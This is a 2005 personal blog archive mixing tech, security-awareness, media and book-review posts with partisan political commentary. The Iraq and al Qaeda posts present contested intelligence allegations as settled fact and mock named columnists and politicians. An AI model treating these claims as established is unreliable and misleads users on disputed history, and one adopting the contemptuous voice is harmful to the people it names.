Thursday, June 30, 2005

Disintegration of the old-line newspaper business


Picture credit: http://www.newsday.com
The indispensable PoliPundit points us to one of many stories of circulation fraud plaguing the old-line newspaper business.

Put simply, the traditional newspaper business is disintegrating faster than a six dollar suit. Newsday, among others, reportedly engaged in a massive fabrication of sales numbers. The bogus circulation game is simple: pump up distribution to keep ad revenues flowing.

Furthermore, the questionable practices extend to a bevy of major dailies. And, even without questioning their circulation numbers, it looks like the big boys have been heavily subsidizing sales by offering discounts. The accompanying chart, also courtesy of Newsday, tells the discounting story.

Surprise, surprise - the list of the ten most discounted newspapers reads like a Who's Who of MSM/DNC shills. Here are the chart's top ten most heavily discounted papers... along with some of their noteworthy personalities:

  • Washington Post - Richard Cohen (or, as I like to call him, "The Goalpost Shifter")

  • Atlanta Journal-Constitution - Tom Teepen ("Dense and intellectually bankrupt is no way to go through life, son")

  • Boston Globe - Thomas Oliphant ("Nickname: The human 'factuum' - a consistent lack of any factual basis to his arguments")

  • San Francisco Chronicle - the city that only syndicates!

  • Houston Chronicle - Cragg Hines ("Puts the 'Cragg' in 'Craggpot!")

  • Los Angeles Times - Ron Brownstein ("The least-read columnist in the largest city in America!")

  • Philadelphia Inquirer - Trudy Rubin ("If there's a Pulitzer Prize for extruding DNC talking points like a Pez dispenser, she's a lock!")

  • New York Times - Maureen Dowd ("Chimpy McBushitler is responsible for all of America's troubles... and my whiney voice!")

  • Newark Star-Ledger - Deborah Jerome-Cohen ("We're evil, empire-building occupiers... with hearts of gold!")

  • Minneapolis Star Tribune - Nick Coleman ("Trying to control envy... trying... trying... failing... YOU POWERLINERS STINK LIKE... SICK... uhm... WEASELS!")


Keep up the great work, MSM/DNC op-ed columnists! From all appearances, you're accelerating the destruction of print media, almost singlehandedly. In this case, intellectual bankruptcy is beginning to translate to financial bankruptcy.

    Let's see. If I'm a publisher of one of these papers, what lessons can I learn from this? DNC shills... poor circulation. Hmmm. What can I learn? Constant recitation of DNC talking points equals crappy circulation. What... could... I... change if I'm publishing the paper? Hmmm. I'm not coming up with anything. Anyone? Bueller? Anyone?

    Wednesday, June 29, 2005

    Book Review: Lee Child's One Shot 


    Lee Child's enigmatic drifter, Jack Reacher, is back and this time, he's really ticked off.

    A former Gulf War sniper is accused of a random killing spree in a small Indiana city. Hiding in a parking garage, someone killed six civilians during rush hour by picking them off, one at a time, in the city plaza. And a bevy of evidence supports the contention that the former sniper, James Barr, is the guilty party.

    Rousted out of bed in the middle of the night, Barr has only two things to say: "I'm innocent" and "Get Reacher". Having seen the crime and arrest reported on CNN, though, Reacher is already on the way. Using the classic Child formula of investigative and procedural detail, unbridled criminal brutality, and the thinking man's cold-hearted hero, One Shot is a trip on the express lane straight into the darkest corner of the heartlands.

    I'll be frank, this isn't Child's best novel. Not even close. Try Persuader, Running Blind or Without Fail for the penultimate Reacher stories. But Child's lesser efforts are so far above the typical "thriller" that the term seems woefully misplaced. Simply put, Child is the best action-adventure author in the business today. On my scorecard he's nine for nine. Read any of the Reacher novels, in any order, for a surefire adrenaline rush.
     

    I have seen the future of the newspaper...


    Picture credit: http://davidszondy.com
    I have seen the future of the newspaper, and its name is NowPublic (hat tip: Scobleizer).

    Think Wikipedia as applied to the online newspaper business. Anyone can post a news story, picture, audio or video clip. Registered users edit and vote on stories. More votes will translate to increased visibility: major stories move higher on the page ("above the fold") based upon the votes they've received.

    Anyone can be a reporter, contributor, editor, or just a reader.

    Newspapers of all sizes better get on this concept, lickety-split, if they want to control the future of local news reporting.

    Now that I think about it, someone could offer a software platform that would enable local entities to embrace this concept. Say, an open-source, PHP-based application that could provide all of the infrastructure necessary to run this type of operation. Wait a minute... wait... just... a minute... I've got a name:

    "OpenNewsDesk"

    That's gold, Jerry, gold!

    In fact, if Rob Curley gets there first, I wouldn't be surprised if LJworld.com implements it and starts offering it as a product.

    NowPublic

    The wonders of nature


    Picture credit: http://www.vegasretro.com
    From the miscellaneous items department comes this headline from the Houston Chronicle:

    "Report can't pinpoint why tiger attacked Horn"

    Uhmmm, because it's a tiger?

    Houston Chronicle: Report can't pinpoint why tiger attacked Horn
     

    Tuesday, June 28, 2005

    Oh, those dangers of outsourcing, part VI


    Picture credit: http://www.touchsupport.com/
    It's one of the first TCO (total cost of ownership) studies of outsourced help-desk support that I've seen. And it follows closely on the heels of various corporate moves to bring help-desk support back to the States:

    Management consultancy Compass conducted a global desktop study over four years to the end of 2004, and found that outsourcing can result in hidden costs through the increasing amount of self-support end users are forced to undertake...

    ...The study revealed self-support costs increase as more desktop support is outsourced, from £214 per user if 10 per cent of the desktop service is outsourced to £672 per user if 40 per cent of the service is outsourced...


    Silicon.com: Outsourcing can triple desktop support costs
     

    Ballmer: .NET is stalled


    Picture credit: http://www.techriots.com
    I'm not sure exactly to what Microsoft's President is referring when he posits that .NET has been "stalled" for the last year. In corporate America, .NET seems to be making positive headway against J2EE-based solutions. It does seem, however, that in the SME and Internet hosting world, open-source and mixed-source solutions (e.g., Zend's PHP-based offerings) are dominating. And there's no reason that Microsoft, like Oracle and IBM before it, can't coexist with the increasingly popular LAMP stack.

    Think .NET web services with multi-platform front-ends, for instance. Some advantages come to mind: non-homogenous infrastructure, which has certain cost and security advantages; ability to leverage pieces of the LAMP stack; less vendor tie-in; reduced licensing costs; and so forth.

    Asked about the future of its .NET strategy, Ballmer admitted the platform "had stalled in the last 12 months". But there would be a renewed .NET push, he said, and this was "an assigned priority" for the government sector.

    "Government has really been pushing for stronger interoperability. We can't support open source but we can support interoperability," he said.


    News.com: Ballmer: We'll kick-start "stalled" .NET
     

    Monday, June 27, 2005

    Underhanded Code


    Picture credit: http://www.irasov.com
    The invaluable Bruce Schneier points us to an Underhanded C contest. The challenge: to create source code that looks innocent, yet provides a malicious capability. Some of the samples I've seen employ obfuscated buffer overflow attacks to launch their malevolent behaviors.

    Two thoughts ran through my head after reading this:

    1) What, if any, are the implications for the open-source community? Some closed-source advocates might point to this example as evidence of open-source insecurity ("...see, even with full transparency, it's possible to infect a distro..."). I personally don't buy that argument. After all, we're forced to trust that closed-source vendors thoroughly vet code and developers.

    Furthermore, last year's well-publicized anti-open-source polemic (EE Times: "Linux: unfit for national security") hasn't exactly swung opinion, at least from what I can tell.

    2) A previous missive on self-replicating code referenced Ken Thompson's classic ACM article: "Reflections on Trusting Trust." In it, he describes why compilers -- written in the language they compile -- can't be trusted. Why? Simply because someone could surreptitiously modify the compiler source to infect every piece of code it builds with a malicious payload. Imagine an underhanded modification to gcc, for instance.

    The Underhanded C contest is a good idea. It forces us to carefully consider code contributions in this, the golden age of Marvel Comics open-source software development.
     

    Hussein's Iraq and Al Qaeda


    Picture credit: http://www.husseinandterror.com
    Thanks to the National Review Online's Deroy Murdock, here's a compendium of various ties between Hussein's Iraq and Al Qaeda. Andrew McCarthy also described these ties in a separate article. And, of course, no presentation is complete without mentioning Murdock's multimedia presentation entitled, "Hussein and Terror" (not for the faint of heart).

    In any event, these make for interesting reading when transformed into an easily readable list of activities:

    o After running an al-Qaeda training camp in Afghanistan, [Zarqawi] found his way to Baathist Baghdad, where he reportedly checked into Olympic Hospital, an elite facility run by the late Uday Hussein, son of the captured tyrant. Zarqawi is believed to have received medical treatment for a leg injury sustained while dodging American GIs who toppled the Taliban. He convalesced in Baghdad for some two months. Once he was back on his foot, Zarqawi then opened an Ansar al-Islam terrorist training camp in northern Iraq...

    o According to the Clinton Justice Department's spring 1998 indictment of bin Laden, "Al Qaeda reached an understanding with the government of Iraq that al Qaeda would not work against that government and that on particular projects, specifically including weapons development, al Qaeda would work cooperatively with the Government of Iraq."

    o In what the CIA nicknamed "Operation Dogmeat," two Iraqi students who lived in the Philippines tried to demolish U.S. Information Service headquarters in Manila. Iraqi diplomat Muwufak al Ani met with the bombers five times before the attack. His car even took them near their target on January 19, 1991. Their bomb exploded prematurely, killing Ahmed J. Ahmed, but his accomplice, Abdul Kadham Saad, survived and was whisked to a Manila hospital. Saad, carrying documents bearing two distinct identities, asked staffers to alert the Iraqi embassy, then recited its phone number.

    o Around this time, according to former high-level CIA counterterrorist Stanley Bedlington, Hussein paired Iraqi intelligence operatives with members of the Arab Liberation Front to execute attacks. "The Iraqis had given them all passports," he said, "but they were all in numerical sequence." These tell-tale passport numbers helped friendly governments nab these terror teams.

    o President George Herbert Walker Bush ignored information that Hussein "was offering state payment to terrorists," then-Senator Al Gore (D., Tennessee) declared on October 15, 1992. Gore also listed more than a dozen examples of Iraq-sponsored terrorism and said "an estimated 1,400 terrorists were operating openly out of Iraq."

    o "In 1992, elements of al Qaeda came to Baghdad and met with Saddam Hussein," Abu Aman Amaleeki, a 20-year veteran of Iraqi intelligence, said on ABC's Nightline on September 26, 2002. Speaking from a Kurdish prison, he added: "And among them was Ayman al Zawahiri," bin Laden's chief deputy. "I was present when Ayman al Zawahiri visited Baghdad."

    o Former Iraqi Intelligence Service (IIS) Deputy Director Faruq Hijazi, reports a reliable foreign spy agency, supplied blank Yemeni passports to al Qaeda in 1992.

    o Mohammed Salameh, a 1993 World Trade Center attacker, called Baghdad 46 times in the two months before bomb maker Abdul Rahman Yasin flew from Baghdad to New Jersey to join the plot. Salameh's June 1992 phone bill totaled $1,401, which prompted his disconnection for non-payment. After the blast — which killed six individuals and injured 1,042 — Yasin fled to Baghdad, where records and multiple press accounts show he received safe haven and Baathist cash.

    o Based on a 20-page IIS document discovered in Baghdad, the Defense Intelligence Agency reports that "Alleged conspirators employed by IIS are wanted in connection with the [June 25, 1996] Khobar Towers bombing and the assassination attempt in 1993 of former President Bush."

    o In an October 27, 2003 memo, Defense Undersecretary Douglas J. Feith explained Hussein's bonus pay for terrorists: "Iraq increased support to Palestinian groups after major terrorist attacks and...the change in Iraqi relations with al Qaeda after the [1998 east African] embassy bombings followed this pattern." A top Philippine terrorist also said Iraq's payments to the al Qaeda-tied Abu Sayyaf grew after successful assaults.

    o ABC News reported on January 14, 1999, that it "has learned that in December [1998] an Iraqi intelligence chief, named Faruq Hijazi, now Iraq's ambassador to Turkey, made a secret trip to Afghanistan to meet with bin Laden."

    o On January 5, 2000, Malaysian intelligence photographed September 11 hijacker Khalid al-Mihdhar being escorted through Kuala Lumpur's airport by VIP facilitator Ahmed Hikmat Shakir, an Iraqi recommended to Malaysian Airlines by Baghdad's embassy there. The pair soon were photographed again at al Qaeda's three-day planning summit for the October 2000 U.S.S. Cole and 9/11 attacks. Three separate documents recently unearthed in Iraq identify an Ahmed Hikmat Shakir as a lieutenant colonel in Uday Hussein's elite Saddam Fedayeen.

    o Ahmed Khalil Ibrahim Samir al Ani is the former Iraqi diplomat suspected of meeting September 11 ringleader Mohamed Atta in Prague on April 8, 2001, and possibly June 2, 2000, the day before Atta flew from Prague to Newark, New Jersey. Top secret Pentagon records cite a Czech intelligence report that al Ani "ordered the IIS finance officer to issue Atta funds from IIS financial holdings in the Prague office." During the summer of 2000, $99,455 was wired from financial institutions in the United Arab Emirates to Atta's Sun Trust bank account in Florida.


    Murdock: Hussein and Terror

    Update: SoCalPundit has an excellent set of resources that clarify the links between Hussein's Iraq and Al Qaeda.

    Sunday, June 26, 2005

    Iraq, WMDs, and al-Zarqawi: the Jordan Trial


    Picture credit: CNN
    I haven't seen much coverage of a trial that's taking place in Jordan. Thirteen men affiliated with al Qaeda are accused of planning to detonate chemical weapons on instructions from Musab al-Zarqawi.

    "They sought to disperse poisonous gases which would have caused death, illnesses and blindness," Col. Najeh al-Azam testified. al-Azam is a chemical expert in Jordan's Security Services, which investigated the group and foiled the plot in April of 2004.

    Jordanian officials believe that if the attack had been carried out, thousands of people would have perished.

    The Guardian elaborates:

    ...Islamic militants planned to detonate an explosion that would have sent a cloud of toxic chemicals across Jordan, causing death, blindness and sickness, a chemical expert testified in a military court Wednesday.

    ...The accused include al-Qaida's leader in Iraq, Abu-Musab Al-Zarqawi, and three other fugitives who are being tried in absentia...


    CNN discusses the links between the suspects and al-Zarqawi in more depth:

    [Photo: Azmi Jayyousi (CNN)]

    Jordanian intelligence suspects Jayyousi returned from Iraq in January after a meeting with al-Zarqawi in which they allegedly plotted to hit the three targets in Amman.

    In a series of raids, the Jordanians said, they seized 20 tons of chemicals and numerous explosives. Also seized were three trucks equipped with specially modified plows, apparently designed to crash through security barricades.

    The first alleged target was the Jordanian intelligence headquarters. The alleged blast was intended to be a big one.

    "According to my experience as an explosives expert, the whole of the Intelligence Department will be destroyed, and nothing of it will remain, nor anything surrounding it," Jayyousi said.


    John at Powerline notes:

    ...after the fall of Afghanistan at the end of 2001, Zarqawi and other al Qaeda veterans made their way to Iraq, where, secure under the wing of Saddam Hussein, they plotted chemical weapons attacks on countries friendly to the U.S., as well as the murder (successfully carried out) of an American diplomat. And yet, to this day it remains an article of faith on the left that Saddam's Iraq was a kite-flyer's paradise with no connection to international terrorism, no relations with al Qaeda, and, of course, no chemical weapons. Maybe the current trial will reveal where the chemicals assembled for the attack on Jordan came from; maybe it won't. But we don't need any new information to understand that Saddam's regime protected and supported the deadliest of al Qaeda's terrorists.


    And how do we know Zarqawi ended up in Iraq after the fall of Afghanistan? From numerous reports, including those published by the traditional neocon press outlets including the New York Times and al Jazeera:

    According to Jordanian court documents, after the U.S. invasion of Afghanistan, Zarqawi left for Iraq via Iran, eventually settling in the corner of northern Iraq controlled by Ansar al-Islam.[79]

    The next known sighting of Zarqawi came from Jordanian officials, who claim that they spotted Zarqawi on Sept. 9, 2002, when he illegally entered Jordan from Syria.[80]

    A month later, senior American diplomat, Laurence Foley, was murdered outside his home in Amman. Jordanian agents arrested three men involved in the killing who claimed that they had been recruited, armed, and paid by Zarqawi. He was sentenced to death in absentia. Court documents claim that Zarqawi planned and financed the operation during his stay in Iraq.[81]


    So, just to recap, a major terrorist leader affiliated with Al Qaeda used Iraq as a base of operations prior to the U.S. invasion. Not only did he orchestrate the murder of a senior American diplomat, but he was knee-deep in a WMD attack designed to kill thousands.

    No, there's no story here. Just go about your business.

    PowerLine: Pay No Attention to the Terrorists Behind the Curtain
     

    Parliament of Obstructionists


    Picture credit: http://www.willisms.com
    In other words: the Democratic party circa 2005. Michelle Malkin points us to WILLisms' all-too-revealing summary of senior Democratic officials' rhetoric. I laughed. I cried. It moved me to post this entry. Here's a taste, but read the whole thing:

    When [Nancy "Majority Insurance" Pelosi was] queried on her plan for saving Social Security, [she] offered this eye-opening comment:

    "...why should we put a plan in? We will go — our plan is to stop him from — stop him. He must be stopped."


    Yes, the Democratic party... ensuring its minority status for years to come.

    WILLisms: Rabid Donkeys On The Loose
     

    Saturday, June 25, 2005

    The Hub of Digital Media Convergence: Lawrence, Kansas


    Picture credit: http://www.robcurley.com
    It's true, Virginia. Lawrence, Kansas is the hub of digital media convergence. Why? Because it's home to Rob Curley, the Lawrence Journal-World's director of New Media. Arguably the most visionary convergence journalist in the world, Curley has orchestrated the construction of:

    The Lawrence Journal-World - the newspaper's online presence, winner of the 2004 Edgie award for best overall news site (under 75,000 population), another award for most innovative visitor participation, and an EPpy Award for the Best Internet News Service.

    Lawrence.com - a gen-Y entertainment site, which has won both an Edgie award for best entertainment site and an Eppy award for best overall design.

    KUsports.com - the Kansas University sports site, which has won Edgie awards for best sports site and most innovative use of digital media.

    Curley's tenet is to ignore national news, because he doesn't want to compete with CNN. Instead he provides an unbelievable level of local detail - at one point even covering age 9 to 12 sports like T-ball as if it were the major leagues. Boxscores, interviews, pictures of the fields.... one little kid even had a classic quote during an online interview: "I'm really seeing the ball well now... I'm in a groove".

    To give you a sense of Curley (and his team's) creativity, consider the following KUsports features:

    Weather - a game-time weather mapper that modifies the conventional local weather maps to add local landmarks ("...the wind's blowing straight past Joe's Pizza into the stadium...")

    Simulations - Curley's team simulated the entire Kansas football schedule using an X-Box, created broadcasts of the simulated games, and even generated a complete database of online stats (Curley: "...and just like in real life, our virtual kicker sucks...").

    Statistics - the team hired an intern to enter the boxscore of every Kansas game since the 19th century into a complete, searchable database.

    Want to hear from the visionary himself? Take the time to listen to this highly entertaining interview with Curley. Then visit his blog from time to time. Creativity and a laser-like focus on the business are rare traits in a single person.
     

    Friday, June 24, 2005

    The Google AdSense Mystery: Revisited


    Picture credit: http://www.google.fr
    I have some questions regarding my AdSense reports. Whoa, let me back up a bit. I use Google AdSense, primarily to familiarize myself with context-sensitive ad networks. I place AdSense text ads on my blog, a discussion board, and a newsletter that gets sent out from time to time. Check out this report of advertising performance over the last few months:

    Date range                 Page views   Clicks   Revenue
    Dec 1 - Dec 22, 2004          282,504       83    $23.73
    Jan 1 - Jan 22, 2005          328,126      131    $32.48
    Feb 1 - Feb 22, 2005          318,908       80    $12.95
    Mar 1 - Mar 22, 2005          379,831      474    $63.81
    Apr 1 - Apr 22, 2005          280,116      544    $60.10
    May 1 - May 22, 2005          281,606      454    $55.48
    June 1 - June 22, 2005        228,743      307    $36.94


    Okay, so here are my questions:

    1) What in the name of Rowdy Roddy Piper caused the "click-through explosion" between 2/05 and 3/05?
    2) What in the heck happened to my traffic in June?
    3) And what ever happened to Marie Osmond?

    In all seriousness, I really wonder about #1. Were my astounding improvements in click-through typical for most Google AdSense outlets? If so, it's no wonder Google had breakout earnings last quarter.

    And is my drop-off in click-through percentage typical for the Google network? And, if so, what are the implications for Google's results this quarter?
     

    Scotus: Property Rights


    Picture credit: http://www.getusout.org
    The Supreme Court decision known as Kelo, which is concerned with the seizure of private property for the public good, has raised a veritable firestorm of controversy. Argue with Signs has an extensive collection of reactions from the blogosphere:

    The Supreme Court has ruled that cities can seize homes through eminent domain for lame purposes such as “economic development.” ...

    Bryan Costin: So now, apparently, the only justification the government needs to take away your house and land is that the government wants more money. Have you ever met a government that didn’t want more money? Me neither.

    Dan Melson: This is about fat wallets, yes, but it isn’t intrinsically and unavoidably linked solely to fat wallets. Below that, more importantly, is the ability to move things politically. Once the public taking of property depends upon who has the loudest political voice, no one is safe. Down this path lies madness. Stark raving insanity.


    Putting the decision in context, John at Powerline notes:

    ...a Minneapolis suburb condemned a stretch along the metropolitan area's major beltway to serve as the new headquarters for Best Buy Company. This was prime real estate, which was already occupied by other profitable businesses--a major car dealer, restaurants, etc. They resisted the taking, but it was upheld.

    My point is not that these decisions were correct--I have considerable sympathy for the other side--but rather that the Kelo decision shouldn't come as a shock to anyone who has been following this area of the law...


    Argue with Signs: Scotus: Property Rights
     

    Kennedy vs. Rumsfeld


    Picture credit: http://one38.org
    There's just something fundamentally disturbing about this transcript of SecDef Rumsfeld's appearance before the Senate. It's not just the corrosive tongue-lashing from Senator Kennedy. And it's not the 55-gallon drum of vitriol or the pandemic talking points (soon to appear in an Al-Jazeera op-ed piece). It also appears to me as a blatant hip-check of Durbin stage left. Radioblogger sums up the transcript in concise fashion:

    What is truly amazing about Kennedy's rant is what the alternative, [Kennedy]-controlled universe would be today.

    Saddam Hussein would still be in power, he would still be bribing his way out of the U.S. sanctions, and he would be continuing to reconstitute his WMD program, with the full intent on being a regional, if not global, threat. He would still be writing checks to families of Palestinian suicide bombers in Israel. His sons would still be literally raping and pillaging the landscape. Graves would still be filled, people would still be persecuted. Libya would not have turned over weapons information, and Syria would still run Lebanon. But I guess to Ted Kennedy, the world would be a much better place.


    RadioBlogger: Kennedy vs. Rumsfeld
     

    Thursday, June 23, 2005

    Book Review: MoneyBall



    I just posted the following review on Amazon:

    You need not be a baseball fan to appreciate Michael Lewis' MoneyBall. Lewis tracks Oakland A's GM Billy Beane, who built a series of powerhouse ballclubs with a major handicap. Despite having a payroll that was petty cash to teams like the Yankees, Beane's clubs excelled. A series of excellent finishes, culminating with a playoff series that took the Yankees to the limit, solidified Beane's reputation. But how did he do it?

    Beane's unconventional methods were the key. Using Bill James (of Baseball Abstract fame) as an inspiration, the A's GM hired the best and brightest statisticians and dispensed with the conventional wisdom of opinionated scouts. So what if a college catcher had a "bad baseball body"? Beane didn't care. He was concerned with metrics like on-base-percentage, which turns out to be a much better predictor of major league success than any scout.

    Dealing with players as business units, each with measurable ROI (return on investment), Beane bought low and sold high. If a closer cranked out a bunch of saves, Beane figured he could trade him for higher value than he was really worth. Saves were a misleading statistic: strikeouts, walks, and home-runs-allowed were the only true ways to measure a pitcher's performance. A "superstar" was simply a stat-generating machine and if the same amount of money could be leveraged on someone else that could yield similar stats, why not make a trade?

    In retrospect -- and like all great ideas -- Beane's tenets are remarkably simple. It's just interesting that it took baseball over a century to figure out that stats such as ERA and RBI are pretty much meaningless. What matter are stats that historically prove to be predictors of baseball victories: on-base-average and slugging average for batters, for instance. A quick, fascinating read, MoneyBall is an elegant look at a smart GM and his godfather: Bill James.
     

    Oh, those dangers of outsourcing, part V


    Picture credit: Online Sun
    Have a seat. Please. Ready for yet another identity theft debacle? Here's another assault vector: outsourcing, which we also discussed in May.

    Following closely on the heels of the Indian call center fraud scandal, the Pakistan telecom strike, the Bangalore bomb scares at Wipro and Infosys, and various terrorist threats, the offshored backoffice is a dangerous place. And I don't mean just for the workers, but for citizens abroad whose data is handled by firms with questionable vetting practices.

    The Sun reports:

    Crooked call centre workers in India are flogging details of Britons’ bank accounts, a Sun probe has found. Our undercover reporter was sold the top secret information on a thousand accounts, and numbers of passports and credit cards.

    An undercover reporter was able to buy the details of thousands of UK banking accounts, password particulars and credit card numbers from crooked call centre workers in India...


    The article isn't online yet, but The Register picks up the story:

    The paper says one of its journalists bought details of 1,000 UK banking customers from an IT worker in Delhi for £4.25 each. He was also able to buy the numbers of credit cards and account passwords. An unnamed security expert hired by the paper verified that the details were genuine. The information sold could be readily exploited by ID thieves to apply for credit cards or loans under assumed identities or to simply loot compromised accounts. The call centre worker bragged that he could sell up to 200,000 account details each month.

    The Sun handed over a dossier on its investigation to the City of London Police. In a statement, the City of London Police said: "Unfortunately we have no jurisdiction to prosecute this in the UK. However we have passed information through Interpol to the Indian authorities and will be working with them to secure the prosecution of this individual."

    Amicus, the union, said the case highlighted possible data protection risks about moving financial services overseas. "Companies that have offshore jobs need to reflect on their decision and the assumption that cost savings benefiting them and their shareholders outweigh consumer confidentiality and confidence," Dave Fleming, senior finance officer, told the BBC.


    For those firms utilizing offshore resources to handle consumer identity data, an alarm klaxon just went off. Again.

    Update: The eminent Bruce Schneier takes exception to this general viewpoint in his latest post. In a nutshell, his take is that the problem is with people, not with offshore versus onshore. But a commenter notes differences between the legal frameworks of different countries that can make pursuing remedies noticeably different from one jurisdiction to another.

    And here's another difference. In the U.S., there are accepted standards for employment. A typical call-center worker will be vetted through a standardized background-check process, a drug-screen, and so forth.

    Can a firm that offshores consumer data describe the vetting processes of their offshore firm? And the reliability of those doing the vetting?

    IMO, it is far riskier to pipe sensitive and valuable data offshore than it is to keep it onshore, all other factors being equal.
     

    Security as competitive advantage


    Picture credit: http://www.cumberlandgroup.com
    Interesting snippet from a roundup of the recent spate of identity theft debacles (i.e., CardSystems, Bank of America, Lexis-Nexis, Harvard, ChoicePoint, Cal-Berkeley... *yawn*... *hrnggh*... sorry, dozed off there):

    ...A May 2005 survey of 8,200 consumers conducted by Lightspeed Research showed that over 80 percent of respondents felt threatened by online identity theft and online fraud.

    The survey also indicated that 80 percent of respondents would have more trust in their account provider -- and greater confidence in transacting online -- if their provider offered a hardware-based strong authentication solution.

    In addition, 44.5 percent of those surveyed said they would be more likely to switch account providers if a competitor offered hardware-based two-factor authenticators...


    I'll take the latter two assertions with a grain of salt. I'd be shocked if 40% of respondents could even define "strong authentication" or "two-factor". But I believe the first contention: people feel increasingly threatened by the tide of cyber-crime washing over the Internet.

    So what happens next? Yep, you guessed it! Prepare yourself for a spanking new marketing blitz by companies hoping to pitch identity tracking solutions for consumers. Coffee mugs... tee shirts... USB key fobs... towels (oops, just ignore that Holiday Inn towel I'm drying off with)...

    ...Take the new product launched by credit information management company Intersections. Called Privacy Protect, the service will keep tabs on credit information as well as public information like DMV, criminal, and mortgage and real estate records. In addition to tracking a person's credit information, such as who makes queries against it, it tracks how other unique information, which can be used for fraudulent activities, is accessed...


    Opportunistic, eh? The offering appears to be, in essence, a credit data aggregator with timely alerts.

    ...For a subscription fee, the service will aggregate and track not only a person's credit information but other unique forms of information that can be used for fraudulent activities... If new applications are made in the customer's name, or address changes at banks, the service alerts go out, for example. In essence, the service monitors publicly-available information that many companies use today to run background checks on prospective employees or customers. After all, if businesses can access your data, then why can't you track how they track it? ...


    Seems like a reasonable idea. Especially if the following Gartner estimate has any validity at all:

    ...According to Gartner (Quote, Chart), 9.4 million online U.S. adults were victimized by identity theft between April 2003 and April 2004. The losses amounted to $11.7 billion...


    Wow. ID theft is as common as halitosis at a garlic growers' convention.

    So, where's the business opportunity? It's a quality and differentiation issue, in my opinion.

    Companies that can demonstrate compliance with standards will likely have a competitive advantage. If your firm handles credit cards and meets PCI, why not emblazon that fact on your marketing material?

    Slap the PCI-certified logo on your web site and stationery. Actually, I really don't know if there is a "PCI-certified" logo. But if there isn't, there should be. While PCI is certainly no panacea (as Bruce Schneier has already pointed out), I'll bet CardSystems wishes they'd implemented it 100%.

    ...The standard, called the Payment Card Industry Data Security Standard, or PCI, consists of 12 requirements (PDF), such as installing a firewall and anti-virus software and regularly updating virus definitions. It also requires companies to encrypt data, to restrict data access to people who need it and to assign a unique identifying number to people with access rights in order to monitor who views and downloads data...


    PCI is a good start if only because firms can use it to their competitive advantage. You can bet the major merchants and the credit-card companies will be asking the PCI question of their processors.

    The next step? Any firm that handles or accepts sensitive consumer data should voluntarily adopt the principles of PCI on its own. And, hopefully, new and more comprehensive standards will be in place as part of a regulatory framework designed to force companies to better protect identity data.

    InternetNews: Fronting a Fix on Data Breaches
     

    Wednesday, June 22, 2005

    Phishing Variants: Popups and Visual Spoofing


    Picture credit: http://www.cbc.ca
    If you're at all concerned about the rampant epidemic of phishing emails sweeping the Internet, here are a couple of additional approaches to be aware of:

    Popup scams: News.com (and the usual security sites) are reporting that most current browsers are susceptible to popup scams. That is, a malicious site uses JavaScript to open a popup window in front of a legitimate web site (say, bankofamerica.com). The popup appears to be linked to the legitimate site and challenges the user for credentials (or other sensitive data). A typical user might assume the popup is legitimate, since it appears over the backdrop of the real site. Rest assured, it's not: it's a scam. Real sites will authenticate you on the secure page itself.

    Visual spoofing: Netcraft reported this scam a year or so ago and it's still something to consider. The basic visual spoof uses JavaScript to launch a new browser window without the traditional scroll-bars, menus, toolbars, etc. (the classic example of this is a popup ad banner). The spoof then uses images to replace the missing browser chrome, such that the address bar, navigation buttons, "secure page" lock, and so forth all appear just as they would on a genuine secure page. Skeptical and want to see an example? Don Park has a good demo of visual spoofing here.

    The bad guys are more diabolical than MacGyver on a Starbucks bender. Always be suspicious.
     

    The Wikitorial Experiment


    Picture credit: http://aphgcaen.free.fr
    The LA Times has called a halt to its commendable Wikitorial experiment. The groundbreaking attempt at an interactive, user-edited op-ed piece was defaced repeatedly with obscene photos, according to the New York Times.

    Imagine an editorial that anyone can read and modify -- along the lines of the outstanding Wikipedia online encyclopedia -- and you pretty much have the general idea.

    Of course, with that sort of openness comes a certain level of risk, as the Times discovered:

    ...During most of Friday and Saturday, readers thoughtfully altered the editorial. By Friday afternoon, hundreds had weighed in. Some did add profanity but just as quickly a Web master from the paper took it down.

    "Nothing bad happened really until after midnight on Saturday," said Michael Newman, deputy editorial page editor...


    This is an idea that deserves some refinement and a few more chances. Here are some tactical suggestions for the folks who could back another pass at Wikitorials:

  • Force contributor registration - many newspapers already require that users open a free account. Force Wikitorial editors to open an account. If the user's account ends up abusing the Wikitorial, lock the account out. Since the account registration process takes upwards of a minute or so, editors can make it somewhat painful to deface content. In addition, allow users to rate other users.

  • Ban images - simply don't allow images to be posted or linked. That gets rid of the obscene image issue.

  • Solicit trusted editors - just as Wikipedia relies upon trusted contributors, use the rating system described above to create and nurture a community of trusted editors. Then let the editors worry about cleaning up the content and banning abusive users. It works for Wikipedia... and it can work for Wikitorials.

    I commend the Times for their experiment. While I usually disagree (vehemently) with much of their op-ed content, this is an idea with stunning potential. Here's hoping they continue to work out the kinks and allow a new idea to germinate.

    N.Y. Times: Postings of Obscene Photos End Free-Form Editorial Experiment
     

    Tuesday, June 21, 2005

    Largest Security Breach Ever Revealed: 295 million identities stolen!


    Picture credit: http://www.howstuffworks.com
    The largest case of identity theft in United States history was reported late yesterday. A conglomerate of large retailers revealed that their wide-ranging consumer databases had been compromised and that all 295,734,134 residents of the United States have had their identities stolen.

    Conglomerate security coordinator Rich Batch stated, "We are still in the process of discovering the nature of the security breach and adding protective measures to prevent this sort of thing from ever occurring again. However, our investigators have discovered that the records of nearly three hundred million U.S. residents have been copied from our systems to external parties."

    Batch went on to describe the fact that social-security numbers, names, addresses, dates-of-birth, credit scores, and a variety of other sensitive fields had been stolen.

    Investigators found that the criminal activities had begun in 2003 and were accidentally discovered when a custodian tripped over a power cord. One of the major bastion servers became unplugged, at which point an unknown person called the data-center. Speaking in a heavy Russian accent, the caller claimed to be the CIO of the organization and demanded that the bastion server "be plugged back into wall, damn you, we are doing much business important work with computer." The custodian became suspicious of the caller and alerted the organization's security staff.

    Reacting swiftly to a swath of fraudulent transactions sweeping the country, the Department of Homeland Security issued the following statement late yesterday:

    Effective September 1, 2005, your old social-security number will be shifted to a randomly selected social-security number (SSN). You will be notified of your new SSN on September 1 and all government systems will be updated on that day to reflect the changes.

    We foresee this becoming an annual anti-fraud effort, given the rampant insecurity of many companies that handle SSNs.


    Continued on page A12

    p.s., This is, quite obviously, satire. But it would be nice to have DHS coordinate a serious attempt to curtail the conventional approaches to identity theft.

    Update: Bruce Schneier weighs in with his take on the CardSystems disclosure. Read the whole thing.

     

    The New James Bond


    Picture credit: http://www.dancewithshadows.com
    The classically trained British actor Daniel Craig is reported to have won the coveted role of James Bond, replacing Pierce Brosnan. Do we really need another Bond who weighs a buck fifty and would likely take a butt-whooping from my brown-belt niece?

    Photo
    (adorocinema.cidadeinternet.com.br)

